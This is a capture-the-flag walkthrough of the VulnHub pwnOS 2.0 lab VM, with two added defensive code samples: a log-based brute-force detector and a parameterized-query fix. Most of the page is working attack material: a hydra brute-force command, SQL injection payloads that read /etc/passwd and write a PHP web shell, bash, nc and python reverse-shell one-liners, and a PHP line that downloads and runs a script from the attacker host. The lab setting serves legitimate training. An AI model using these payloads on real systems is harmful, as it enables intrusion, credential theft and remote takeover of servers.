Table of Contents
Brute-forcing the web login page with hydra
Logging in to the blog with the recovered account password
Injection to read files with load_file
sqlmap --file-write --file-dest did not succeed
Target address
https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
Network: host-only mode, target at 10.10.10.100
The attacker's IP must also be on the 10.10.10.0/24 segment, so adjust the virtual network settings accordingly.
Information gathering: port scan
<pre>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
</pre>
Check with whatweb whether the site runs a CMS
<pre>root@kali:~# whatweb 10.10.10.100
http://10.10.10.100 [200 OK] Apache[2.2.17], Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[[email protected]], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], IP[10.10.10.100], PHP[5.3.5-1ubuntu7], Title[Welcome to this Site!], X-Powered-By[PHP/5.3.5-1ubuntu7]
root@kali:~# whatweb -v 10.10.10.100
WhatWeb report for http://10.10.10.100
Status : 200 OK
Title : Welcome to this Site!
IP : 10.10.10.100
Country : RESERVED, ZZ
Summary : Email[[email protected]], PHP[5.3.5-1ubuntu7], Cookies[PHPSESSID], X-Powered-By[PHP/5.3.5-1ubuntu7], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], Apache[2.2.17]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.2.17 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
http://www.regular-expressions.info/email.html for valid
email address matching.
String : [email protected]
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.2.17 (Ubuntu) (from server string)
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 5.3.5-1ubuntu7
Google Dorks: (2)
Website : http://www.php.net/
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/5.3.5-1ubuntu7 (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Sun, 01 Nov 2020 12:03:58 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7
Set-Cookie: PHPSESSID=l0bmtqrfk7rh83bq157fbfm585; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 500
Connection: close
Content-Type: text/html
</pre>
Browse the site on port 80
Directory enumeration (dirb)
<pre>---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)
</pre>
PHP version from phpinfo (info.php)
<pre>PHP Version 5.3.5-1ubuntu7 Apache/2.2.17 (Ubuntu) Server Administrator : webmaster@localhost PATH : /usr/local/bin:/usr/bin:/bin</pre>
Search for exploits
Brute-forcing the web login page with hydra
root@kali:~# hydra -t 1 -l [email protected] -P /usr/share/wordlists/rockyou.txt -vV -f 10.10.10.100 http-post-form "/:email=^USER^&password=^PASS^&submit=Login&submitted=TRUE:error"
Brute-force run
Cracked password: killerbeesareflying
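From the server side, a hydra run like the one above shows up as a burst of POSTs to the login form from a single address. The detector below is an added example, not part of the original walkthrough: it parses Apache combined-format access lines (constructed here) and flags any client that exceeds a threshold of login POSTs inside a sliding time window; the endpoint paths, window and threshold are assumptions to tune per site.

```python
"""Detect login brute-force bursts in Apache access logs (added example, not from the blog)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"]))


def find_bruteforce(lines, login_paths=("/", "/login", "/login.php"), window_s=60, threshold=10):
    """Return {ip: peak_count} for clients exceeding `threshold` login POSTs in any `window_s` window."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    offenders = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or path.split("?", 1)[0] not in login_paths:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > timedelta(seconds=window_s):
            q.popleft()              # drop attempts that fell out of the window
        if len(q) >= threshold:
            offenders[ip] = max(offenders.get(ip, 0), len(q))
    return offenders


# Constructed sample log: one client posting to /login every 2 seconds, one normal visitor.
SAMPLE_LOG = [
    f'10.10.10.128 - - [01/Nov/2020:12:05:{i:02d} +0000] "POST /login HTTP/1.1" 200 1174 "-" "Mozilla/5.0"'
    for i in range(0, 24, 2)
] + [
    '10.10.10.50 - - [01/Nov/2020:12:05:03 +0000] "GET /blog/ HTTP/1.1" 200 4121 "-" "Mozilla/5.0"',
    '10.10.10.50 - - [01/Nov/2020:12:05:40 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))  # {'10.10.10.128': 12}
```

Rate limiting or an account lockout on the login endpoint stops this class of attack at the source; the detector is for spotting it in logs after the fact.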
Error-based injection
Username:[email protected]' and updatexml(1,concat(0x3a,(0x0a,(select database()))))#
Password:x
Logging in to the blog with the recovered account password
View the page source
The source reveals the blog software: view-source:http://sourceforge.net/projects/sphpblog/
Checking login.php again, the page returns an error
Injection to read files with load_file
email=admi'union select 1,2,3,group_concat(load_file('/etc/passwd')),5,6,7,8#&pass=123456&submit=Login&submitted=TRUE
Writing a file with INTO OUTFILE
email=admi'union select 1,2,3,'<?php system($_GET[\'cmd\'])',5,6,7,8 into outfile"/var/www/shell.php"#&pass=123456&submit=Login&submitted=TRUE
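The union payloads above only work because the login page splices the submitted email straight into its SQL text. The snippet below is an added example, not the target application's code: it shows that vulnerable lookup next to a parameterized one, using sqlite3 in place of MySQL (hence `--` rather than `#` for the trailing comment, and no load_file/INTO OUTFILE) against a constructed users table.

```python
"""Vulnerable vs. parameterized login lookup (added example, sqlite3 standing in for MySQL)."""
import sqlite3


def make_db():
    """Constructed demo table; the real application's schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, email TEXT, pass TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin@example.com', 'secret', 'admin')")
    return db


def login_vulnerable(db, email, password):
    # Attacker-controlled strings are spliced into the query text, so a quote ends the
    # literal and everything after it is parsed as SQL.
    sql = f"SELECT id, email, role FROM users WHERE email='{email}' AND pass='{password}'"
    return db.execute(sql).fetchone()


def login_safe(db, email, password):
    # Placeholders: the driver passes values separately from the statement, so quotes,
    # UNION and comment markers in the input are just characters in a string.
    sql = "SELECT id, email, role FROM users WHERE email=? AND pass=?"
    return db.execute(sql, (email, password)).fetchone()


# Same shape as the page's payload: close the string, UNION a fabricated row, comment out the rest.
PAYLOAD = "admi' UNION SELECT 1, 'nobody', 'admin' -- "


def demo():
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, PAYLOAD, "123456"),   # (1, 'nobody', 'admin')
        "safe": login_safe(db, PAYLOAD, "123456"),               # None: no such email
        "legit": login_safe(db, "admin@example.com", "secret"),  # real row still found
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:10s} -> {row}")
```

On MySQL, load_file() and INTO OUTFILE additionally require the FILE privilege and are constrained by secure_file_priv, so the web application's database account should never be granted FILE.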
Command execution
Reverse shell [1]
bash: bash -i >& /dev/tcp/ip/port 0>&1
nc: nc -e /bin/sh ip port
Reverse shell [2]
python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The python reverse shell is the one used
Privilege escalation
Direct login succeeded
(2) View the blog source code
MSF
Created a new account and password
Login successful
The edit and image-upload functions appear
Upload php-reverse-shell.php
Reverse shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
View the kernel version (web)
Database
Escalate to root
(3) sqlmap
First check whether the PHP login page can be brute-forced or bypassed with a universal password, then try SQL injection.
Capture the POST request
sqlmap
Database information
Get user information
killerbeesareflying
Log in
--os-shell file upload link
Backdoor
Reverse shell
10.10.10.100/php-reverse-shell.php
No result: the shell does not connect back
Checking disable_functions in phpinfo shows that nothing is disabled
<?php system("cd /tmp; wget http://10.10.10.128/python.py; python python.py");?>
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
sqlmap --file-write --file-dest did not succeed
Reference links
https://www.cnblogs.com/zongdeiqianxing/p/13455187.html
https://www.jianshu.com/p/2e492632c191
https://blog.csdn.net/Lonelyhat/article/details/105840547